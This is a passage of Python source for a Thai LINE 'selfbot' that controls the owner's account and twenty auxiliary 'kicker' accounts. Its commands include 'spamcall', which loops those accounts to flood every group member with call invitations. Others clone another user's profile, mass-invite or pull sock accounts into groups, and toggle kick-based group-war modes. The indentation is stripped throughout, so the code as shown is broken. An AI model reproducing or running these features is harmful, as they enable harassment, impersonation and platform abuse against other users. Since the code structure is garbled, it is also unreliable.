            line.sendReplyMessage(msg_id,to, line.getContact(sender).displayName, contentMetadata = {'previewUrl': 'https://media.giphy.com/media/T9qJa0lfRjXsQ/source.gif', 'i-installUrl': 'line://app/1602687308-GXq4Vvk9?type=profile', 'type': 'mt', 'subText': "", 'a-installUrl': 'line://app/1602687308-GXq4Vvk9?type=profile', 'a-packageName': 'line://app/1602687308-GXq4Vvk9?type=profile', 'countryCode': 'line://app/1602687308-GXq4Vvk9?type=profileID', 'a-linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile', 'i-linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile', 'id': 'line://app/1602687308-GXq4Vvk9?type=profile', 'text': 'รัตน์ไง', 'linkUri': 'line://app/1602687308-GXq4Vvk9?type=profile'}, contentType=19)
elif cmd == 'ออน':
runtime = time.time() - programStart
line.sendMessage(to,format_timespan(runtime))
elif cmd == 'author':
line.sendMessage(to, 'Author is linepy')
elif cmd == 'me3':
line.sendReplyMessage(msg_id, to,"Fn",contentMetadata={'vCard': 'BEGIN:VCARD\r\nVERSION:3.0\r\nPRODID:ANDROID 8.13.3 Android OS 4.4.4\r\nFN:\\'+line.getContact(sender).displayName+'\nTEL;TYPE=mobile:'+line.getContact(sender).statusMessage+'\r\nN:?;\\,\r\nEND:VCARD\r\n', 'displayName': line.getContact(sender).displayName},contentType=13)
elif cmd == 'about':
try:
arr = []
owner = "ucccca2ada2b522c6d59e6640f29aafd0"
creator = line.getContact(owner)
contact = line.getContact(myMid)
grouplist = line.getGroupIdsJoined()
contactlist = line.getAllContactIds()
blockedlist = line.getBlockedContactIds()
ret_ = "____________________________\n❨✪❩ Impormation Selfbot ❨✪❩\n____________________________"
ret_ += "\n┃❨✪❩ Line Name : {}".format(contact.displayName)
ret_ += "\n┃❨✪❩ Groups : {}".format(str(len(grouplist)))
ret_ += "\n┃❨✪❩ Friends : {}".format(str(len(contactlist)))
ret_ += "\n┃❨✪❩ Blocked : {}".format(str(len(blockedlist)))
ret_ += "\n┃❨✪❩ Version1 : Python3 Update"
ret_ += "\n┃❨✪❩ Version2 : Premium server"
ret_ += "\n┃❨✪❩ Server : Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-33-generic x86_64)"
ret_ += "\n┃❨✪❩ Edit : 14-11-2018"
ret_ += "\n┃❨✪❩ Creator : {}".format(creator.displayName)
ret_ += "\n____________________________"
line.sendMessage(to, str(ret_))
except Exception as e:
line.sendMessage(msg.to, str(e))
elif cmd == 'status':
res = '╭───「 Status 」'
res += '\n├ Auto Add : ' + bool_dict[settings['autoAdd']['status']][1]
res += '\n├ Auto Join : ' + bool_dict[settings['autoJoin']['status']][1]
res += '\n├ Auto Respond : ' + bool_dict[settings['autoRespond']['status']][1]
res += '\n├ Auto Respond Mention : ' + bool_dict[settings['autoRespondMention']['status']][1]
res += '\n├ Auto Read : ' + bool_dict[settings['autoRead']][1]
res += '\n├ Setting Key : ' + bool_dict[settings['setKey']['status']][1]
res += '\n├ Mimic : ' + bool_dict[settings['mimic']['status']][1]
res += '\n├ Greetings Join : ' + bool_dict[settings['greet']['join']['status']][1]
res += '\n├ Greetings Leave : ' + bool_dict[settings['greet']['leave']['status']][1]
res += '\n├ Check Contact : ' + bool_dict[settings['checkContact']][1]
res += '\n├ Check Post : ' + bool_dict[settings['checkPost']][1]
res += '\n├ Check Sticker : ' + bool_dict[settings['checkSticker']][1]
res += '\n╰───「SelfBot ProtectV2.2」'
line.sendMessage(to, parsingRes(res))
elif cmd == 'abort':
aborted = False
if to in settings['changeGroupPicture']:
settings['changeGroupPicture'].remove(to)
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปภาพกลุ่มเรียบร้อย')
aborted = True
if settings['changePictureProfile']:
settings['changePictureProfile'] = False
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปภาพโปรไฟล์เรียบร้อย')
aborted = True
if settings['changeCoverProfile']:
settings['changeCoverProfile'] = False
line.sendMessage(to, 'ยกเลิกเปลี่ยนรูปปกเรียบร้อย')
aborted = True
if not aborted:
line.sendMessage(to, 'ไม่สามารถยกเลิกได้\nไม่มีอะไรไห้ยกเลิก')
elif cmd.startswith("midcopy "):
target = removeCmd("midcopy", text)
if target is not None:
cloneProfile(target)
line.sendContact(to,myMid)
line.sendMessage(to,"คัดลอกบัญชีเรียบร้อยแล้ว")
elif cmd.startswith("copy "):
if sender in myMid:
                if 'MENTION' in msg.contentMetadata:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
                    if len(lists) != 0:
ls = random.choice(lists)
cloneProfile(ls)
line.sendMessage(to,"คัดลอกบัญชีเรียบร้อยแล้ว")
elif cmd == "load":
if sender in myMid:
try:
restoreProfile()
line.sendMessage(to, "เรียกคืนสถานะบัญชีสำเร็จโปรดรอสักครู่จนกว่าโปรไฟล์จะเปลี่ยน")
except Exception as e:
line.sendMessage(to, "ไม่สามารถเรียกคืนสถานะบัญชีได้")
line.sendMessage(msg.to, str(e))
elif cmd == "save":
if sender in myMid:
try:
backupProfile()
line.sendMessage(to, "บันทึกสถานะบัญชีเรียบร้อยแล้ว")
except Exception as e:
line.sendMessage(to, "ไม่สามารถบันทึกสถานะบัญชีได้")
line.sendMessage(msg.to, str(e))
elif cmd == 'speed2':
start = time.time()
sendMentionxd(msg.to, sender, "「Your Test Speed Bot」 ", "")
elapse = time.time() - start
line.sendMessage(to, ' %s seconds' % str(elapse),{'AGENT_ICON': 'https://i.imgur.com/GSE9LLM.gif','AGENT_NAME': 'รัตน์','AGENT_LINK': 'line://app/1608998163-Xxzr1PmV'})
elif cmd == 'infome':
arr = []
mention = "@x\n"
text = msg.text[len("infome"):].strip()
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':myMid}
arr.append(arrData)
today = datetime.today()
future = datetime(2018,7,25)
hari = (str(future - today))
comma = hari.find(",")
hari = hari[:comma]
teman = line.getAllContactIds()
gid = line.getGroupIdsJoined()
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
h = line.getContact(myMid)
line.reissueUserTicket()
My_Id = line.profile.displayName + "\nMy id Line: http://line.me/ti/p/" + line.getUserTicket().id
text += mention+"TIME : "+datetime.strftime(timeNow,'%H:%M:%S')+" Thailand\nMy Group : "+str(len(gid))+"\nMy Friend: "+str(len(teman))+"\nMy Mid : "+h.mid+"\nMy Name : "+My_Id
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
elif text.lower() == 'เปลี่ยนวีดีโอ':
if wait["selfbot"] == True:
if msg._from in admin:
line.sendMessage(to, "กรุณารอ20-30นาที")
picture = line.downloadFileURL("https://i.imgur.com/83Z5C2f.png", saveAs="image.png")
video = line.downloadFileURL("https://www.saveoffline.com/get/?i=eAQRQWRnY9Rs3RTdn3jZUV6sNVQkzqsJ&u=qQaKnkcoKrbhu8sr0CiqKlFxpiiOvHUX", saveAs="video.mp4")
changeVideoAndPictureProfile(picture, video)
line.sendMessage(to, "เปลี่ยนเรียบร้อย")
elif cmd == 'test':
line.sendTextWithFooter(to, "Footer message", footerIconURL="https://os.line.naver.jp/os/p/" + line.profile.mid, footerText="Footer", footerURL="https://line.me/ti/p/wprfnIo55O")
line.sendMessage(to, 'Your Test',{'AGENT_LINK': 'line://app/1608998163-Xxzr1PmV','AGENT_ICON': 'https://i.imgur.com/GSE9LLM.gif','AGENT_NAME': 'รัตน์'})
elif cmd == "เชคบอท":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention1(msg.to, sender, "「Ready」 ", "")
sendMention2(msg.to, sender, "「Ready」 ", "")
sendMention3(msg.to, sender, "「Ready」 ", "")
sendMention4(msg.to, sender, "「Ready」 ", "")
sendMention5(msg.to, sender, "「Ready」 ", "")
sendMention6(msg.to, sender, "「Ready」 ", "")
sendMention7(msg.to, sender, "「Ready」 ", "")
sendMention8(msg.to, sender, "「Ready」 ", "")
sendMention9(msg.to, sender, "「Ready」 ", "")
sendMention10(msg.to, sender, "「Ready」 ", "")
sendMention11(msg.to, sender, "「Ready」 ", "")
sendMention12(msg.to, sender, "「Ready」 ", "")
sendMention13(msg.to, sender, "「Ready」 ", "")
sendMention14(msg.to, sender, "「Ready」 ", "")
sendMention15(msg.to, sender, "「Ready」 ", "")
sendMention16(msg.to, sender, "「Ready」 ", "")
sendMention17(msg.to, sender, "「Ready」 ", "")
sendMention18(msg.to, sender, "「Ready」 ", "")
sendMention19(msg.to, sender, "「Ready」 ", "")
sendMention20(msg.to, sender, "「Ready」 ", "")
elif cmd == "ceklogin":
if wait["selfbot"] == True:
if msg._from in admin:
try:
sendMention1(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention2(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention3(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention4(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention5(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention6(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention7(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention8(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention9(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention10(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention11(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention12(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention13(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention14(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention15(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention16(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention17(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention18(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention19(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
sendMention20(msg.to, sender, "「Ready」 ", "NOT LOG_OUT")
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "responname":
if wait["selfbot"] == True:
if msg._from in admin:
try:
kicker.sendMessage(msg.to,responsename1)
kicker2.sendMessage(msg.to,responsename2)
kicker3.sendMessage(msg.to,responsename3)
kicker4.sendMessage(msg.to,responsename4)
kicker5.sendMessage(msg.to,responsename5)
kicker6.sendMessage(msg.to,responsename6)
kicker7.sendMessage(msg.to,responsename7)
kicker8.sendMessage(msg.to,responsename8)
kicker9.sendMessage(msg.to,responsename9)
kicker10.sendMessage(msg.to,responsename10)
kicker11.sendMessage(msg.to,responsename11)
kicker12.sendMessage(msg.to,responsename12)
kicker13.sendMessage(msg.to,responsename13)
kicker14.sendMessage(msg.to,responsename14)
kicker15.sendMessage(msg.to,responsename15)
kicker16.sendMessage(msg.to,responsename16)
kicker17.sendMessage(msg.to,responsename17)
kicker18.sendMessage(msg.to,responsename18)
kicker19.sendMessage(msg.to,responsename19)
kicker20.sendMessage(msg.to,responsename20)
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "inv":
if wait["selfbot"] == True:
if msg._from in admin:
try:
anggota = [Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid]
line.inviteIntoGroup(msg.to, anggota)
kicker.acceptGroupInvitation(msg.to)
kicker2.acceptGroupInvitation(msg.to)
kicker3.acceptGroupInvitation(msg.to)
kicker4.acceptGroupInvitation(msg.to)
kicker5.acceptGroupInvitation(msg.to)
kicker6.acceptGroupInvitation(msg.to)
kicker7.acceptGroupInvitation(msg.to)
kicker8.acceptGroupInvitation(msg.to)
kicker9.acceptGroupInvitation(msg.to)
kicker10.acceptGroupInvitation(msg.to)
kicker11.acceptGroupInvitation(msg.to)
kicker12.acceptGroupInvitation(msg.to)
kicker13.acceptGroupInvitation(msg.to)
kicker14.acceptGroupInvitation(msg.to)
kicker15.acceptGroupInvitation(msg.to)
kicker16.acceptGroupInvitation(msg.to)
kicker17.acceptGroupInvitation(msg.to)
kicker18.acceptGroupInvitation(msg.to)
kicker19.acceptGroupInvitation(msg.to)
kicker20.acceptGroupInvitation(msg.to)
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "antijs stay":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ginfo = line.getGroup(msg.to)
line.inviteIntoGroup(msg.to, [g1MID])
line.sendMessage(msg.to,"Group 「"+str(ginfo.name)+"」 ทำการเปิดใช้งานโหมดป้องกันJS")
except Exception as e:
line.sendMessage(msg.to,"เกิดข้อผิดพลาด\n" +str(e))
elif cmd == "~~":
if wait["selfbot"] == True:
if msg._from in admin:
G = line.getGroup(msg.to)
kicker.leaveGroup(msg.to)
kicker2.leaveGroup(msg.to)
kicker3.leaveGroup(msg.to)
kicker4.leaveGroup(msg.to)
kicker5.leaveGroup(msg.to)
kicker6.leaveGroup(msg.to)
kicker7.leaveGroup(msg.to)
kicker8.leaveGroup(msg.to)
kicker9.leaveGroup(msg.to)
kicker10.leaveGroup(msg.to)
kicker11.leaveGroup(msg.to)
kicker12.leaveGroup(msg.to)
kicker13.leaveGroup(msg.to)
kicker14.leaveGroup(msg.to)
kicker15.leaveGroup(msg.to)
kicker16.leaveGroup(msg.to)
kicker17.leaveGroup(msg.to)
kicker18.leaveGroup(msg.to)
kicker19.leaveGroup(msg.to)
kicker20.leaveGroup(msg.to)
elif cmd == "kicker join":
if msg._from in admin:
G = line.getGroup(msg.to)
ginfo = line.getGroup(msg.to)
G.preventedJoinByTicket = False
line.updateGroup(G)
invsend = 0
Ticket = line.reissueGroupTicket(msg.to)
g1.acceptGroupInvitationByTicket(msg.to,Ticket)
G = g1.getGroup(msg.to)
G.preventedJoinByTicket = True
g1.updateGroup(G)
elif cmd == "kicker bye":
if msg._from in admin:
G = line.getGroup(msg.to)
g1.leaveGroup(msg.to)
elif cmd == "/k:speed":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
kicker.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker2.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker2.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker3.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker3.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker4.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker4.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker5.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker5.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker6.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker6.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker7.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker7.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker8.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker8.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker9.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker9.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker10.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker10.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker11.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker11.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker12.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker12.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker13.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker13.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker14.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker14.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker15.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker15.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker16.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker16.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker17.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker17.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker18.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker18.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker19.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker19.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
start = time.time()
kicker20.sendMessage("u21d04f683a70ee8776c4c58a0358c204", ".")
elapsed_time = time.time() - start
kicker20.sendMessage(msg.to, "[ %s Seconds ] [ " % (elapsed_time) + str(int(round((time.time() - start) * 1000)))+" ms ]")
elif "spamcall" in msg.text.lower():
if msg.toType == 2:
sep = msg.text.split(" ")
resp = msg.text.replace(sep[0] + " ","")
num = int(resp)
try:
sendMention1(msg.to, sender, "「SpamCall Ready」 ", "")
except:
pass
while range(1):
group = kicker.getGroup(to)
members = [mem.mid for mem in group.members]
for var in range(num):
kicker.acquireGroupCallRoute(to)
kicker.inviteIntoGroupCall(to, contactIds=members)
kicker2.acquireGroupCallRoute(to)
kicker2.inviteIntoGroupCall(to, contactIds=members)
kicker3.acquireGroupCallRoute(to)
kicker3.inviteIntoGroupCall(to, contactIds=members)
kicker4.acquireGroupCallRoute(to)
kicker4.inviteIntoGroupCall(to, contactIds=members)
kicker5.acquireGroupCallRoute(to)
kicker5.inviteIntoGroupCall(to, contactIds=members)
kicker6.acquireGroupCallRoute(to)
kicker6.inviteIntoGroupCall(to, contactIds=members)
kicker7.acquireGroupCallRoute(to)
kicker7.inviteIntoGroupCall(to, contactIds=members)
kicker8.acquireGroupCallRoute(to)
kicker8.inviteIntoGroupCall(to, contactIds=members)
kicker9.acquireGroupCallRoute(to)
kicker9.inviteIntoGroupCall(to, contactIds=members)
kicker10.acquireGroupCallRoute(to)
kicker10.inviteIntoGroupCall(to, contactIds=members)
kicker11.acquireGroupCallRoute(to)
kicker11.inviteIntoGroupCall(to, contactIds=members)
kicker12.acquireGroupCallRoute(to)
kicker12.inviteIntoGroupCall(to, contactIds=members)
kicker13.acquireGroupCallRoute(to)
kicker13.inviteIntoGroupCall(to, contactIds=members)
kicker14.acquireGroupCallRoute(to)
kicker14.inviteIntoGroupCall(to, contactIds=members)
kicker15.acquireGroupCallRoute(to)
kicker15.inviteIntoGroupCall(to, contactIds=members)
kicker16.acquireGroupCallRoute(to)
kicker16.inviteIntoGroupCall(to, contactIds=members)
kicker17.acquireGroupCallRoute(to)
kicker17.inviteIntoGroupCall(to, contactIds=members)
kicker18.acquireGroupCallRoute(to)
kicker18.inviteIntoGroupCall(to, contactIds=members)
kicker19.acquireGroupCallRoute(to)
kicker19.inviteIntoGroupCall(to, contactIds=members)
kicker20.acquireGroupCallRoute(to)
kicker20.inviteIntoGroupCall(to, contactIds=members)
sendMention1(msg.to, sender, "「SpamCall End」 ", "")
break
else:
kicker.sendMessage(to,"คำสั่งนี้สามารถใช้ได้เฉพาะกลุ่ม")
elif 'Set autolike ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Set autolike ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "เกิดข้อผิดพลาดร้ายแรง")
else:
wait["comment"] = spl
line.sendMessage(msg.to, "「Autolike」\nเปลี่ยนคอมเม้นเป็น\n「{}」".format(str(spl)))
elif text.lower() == "cek autolike":
if msg._from in admin:
line.sendMessage(msg.to, "「AutoLike」\nคอมเม้นของคุณคือ!\n「 " + str(wait["comment"]) + " 」")
elif cmd.startswith('like '):
textt = removeCmd(text, setKey)
texttl = textt.lower()
if texttl == 'on':
if wait['autoLike']:
line.sendMessage(to, "「AutoLike on」")
else:
wait['autoLike'] = True
line.sendMessage(to, "「AutoLike on」")
elif texttl == 'off':
if not wait['autoLike']:
line.sendMessage(to, "「AutoLike off」")
else:
wait['autoLike'] = False
line.sendMessage(to, "「AutoLike off」")
#===========Protection============#
elif 'Po1 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Po1 ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "URL Protect Start"
else:
protectqr.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "URL Protect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT URL」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "URL Protect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "URL Protect Trun off"
line.sendMessage(msg.to, "「STATUS PROTECT URL」\n" + msgs)
elif 'Po2 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Po2 ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Kick Member Protect Start"
else:
protectkick.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Kick Member Protect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT KICK」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Kick Member Protect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "Kick Member Protect Trun off"
line.sendMessage(msg.to, "「STATUS PROTECT KICK」\n" + msgs)
elif 'Po3 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Po3 ','')
if spl == 'on':
if msg.to in protecARoin:
msgs = "Joinkick Start"
else:
protecARoin.append(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Joinkick Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT JOIN」\n" + msgs)
elif spl == 'off':
if msg.to in protecARoin:
protecARoin.remove(msg.to)
ginfo = line.getGroup(msg.to)
msgs = "Joinkick Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "Joinkick Trun off"
line.sendMessage(msg.to, "「STATUS PROTECT JOIN」\n" + msgs)
elif 'Protectcanceljs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcanceljs ','')
if spl == 'on':
if msg.to in protectcanceljs:
msgs = "ป้องกันยกเลิกเชิญบอทเปิดใช้งาน"
else:
protectcanceljs[msg.to] = True
f=codecs.open('protectcanceljs.json','w','utf-8')
json.dump(protectcanceljs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญบอทเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif spl == 'off':
if msg.to in protectcanceljs:
del protectcanceljs[msg.to]
f=codecs.open('protectcanceljs.json','w','utf-8')
json.dump(protectcanceljs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญบอทปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันยกเลิกเชิญบอทปิดใช้งาน"
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "ป้องกันยกเลิกเชิญถูกเปิดใช้งานอยู่แล้ว"
else:
protectcancel[msg.to] = True
f=codecs.open('protectcancel.json','w','utf-8')
json.dump(protectcancel, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
del protectcancel[msg.to]
f=codecs.open('protectcancel.json','w','utf-8')
json.dump(protectcancel, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันยกเลิกเชิญปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันยกเลิกเชิญถูกปิดใช้งานอยู่แล้ว"
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif 'Po4 ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Po4 ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "InviteProtect Start"
else:
protectinvite[msg.to] = True
f=codecs.open('protectinvite.json','w','utf-8')
json.dump(protectinvite, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "InviteProtect Start\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
del protectinvite[msg.to]
f=codecs.open('protectinvite.json','w','utf-8')
json.dump(protectinvite, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "InviteProtect Trun off\nIn Group : " +str(ginfo.name)
else:
msgs = "InviteProtect Trun off"
line.sendMessage(msg.to, "「STATUS PROTECT CANCEL」\n" + msgs)
elif 'Antijs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Antijs ','')
if spl == 'on':
if msg.to in protectantijs:
msgs = "ป้องกันJSถูกเปิดใช้งานอยู่แล้ว"
else:
protectantijs[msg.to] = True
f=codecs.open('protectantijs.json','w','utf-8')
json.dump(protectantijs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันJSเปิดใช้งาน\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif spl == 'off':
if msg.to in protectantijs:
del protectantijs[msg.to]
f=codecs.open('protectantijs.json','w','utf-8')
json.dump(protectantijs, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ป้องกันJSปิดใช้งาน\nIn Group : " +str(ginfo.name)
else:
msgs = "ป้องกันJSถูกปิดใช้งานอยู่แล้ว"
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif "whois " in msg.text.lower():
spl = re.split("whois ",msg.text,flags=re.IGNORECASE)
if spl[0] == "":
msg.contentType = 13
msg.text = None
msg.contentMetadata = {"mid":spl[1]}
line.sendMessage(msg.to,text = None,contentMetadata = {"mid":spl[1]},contentType = 13)
elif 'Ghost ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Ghost ','')
if spl == 'on':
if msg.to in ghost:
msgs = "เปิดใช้งานโหมด Ghost"
else:
ghost[msg.to] = True
f=codecs.open('ghost.json','w','utf-8')
json.dump(ghost, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "เปิดใช้งานโหมด Ghost\nIn Group : " +str(ginfo.name)
line.sendMessage(msg.to, "「STATUS PROTECT JS」\n" + msgs)
elif spl == 'off':
if msg.to in ghost:
del ghost[msg.to]
f=codecs.open('ghost.json','w','utf-8')
json.dump(ghost, f, sort_keys=True, indent=4,ensure_ascii=False)
ginfo = line.getGroup(msg.to)
msgs = "ปิดใช้งานโหมด Ghost\nIn Group : " +str(ginfo.name)
else:
msgs = "ปิดใช้งานโหมด Ghost"
